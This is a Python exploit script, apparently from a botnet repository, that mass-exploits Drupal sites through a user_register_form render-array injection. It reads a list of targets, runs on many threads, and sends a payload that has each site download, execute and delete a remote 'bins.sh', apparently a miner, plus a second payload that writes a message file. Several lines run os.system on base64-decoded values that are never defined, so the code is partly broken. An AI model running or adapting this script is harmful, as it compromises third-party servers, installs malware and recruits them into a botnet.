Path: blob/master/Botnets/Exploits/DRUPAL/drupal.py
5038 views
#DISCORD: https://discord.gg/PTW3yPp12#!/usr/bin/env3import sys4import requests5import os6from multiprocessing.dummy import Pool789print ('##################################################')10print ('# DruPalGgDdOn /////// - #')11print ('##################################################')1213sendMiner = True14sendMessage = True1516verify = False17headers = {'User-Agent': 'Mozilla 5.0'}1819evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"20messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "tee ReadMeCVE.txt'}21minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}2223try:24target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]25except IndexError:26exit('Usage: exploit.py list.txt threads')272829def run(targetLine):30try:31try:32targetLine = 'http://'+targetLine+'/'33url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'3435if sendMiner:36minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)37if sendMessage:38messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)39except requests.exceptions.RequestException as e:40pass4142print ('[+] Attempting: '+targetLine);4344except:45pass464748try:49multiThreads = Pool(int(sys.argv[2]))50except IndexError:51exit('Usage: exploit.py list.txt threads')52reValue = str(base64.b64decode(requestValue))53seValue = str(base64.b64decode(sendValue))54os.system(reValue)55os.system(seValue)56multiThreads.map(run, target)57multiThreads.close()58multiThreads.join()5960print("Finished File!")6162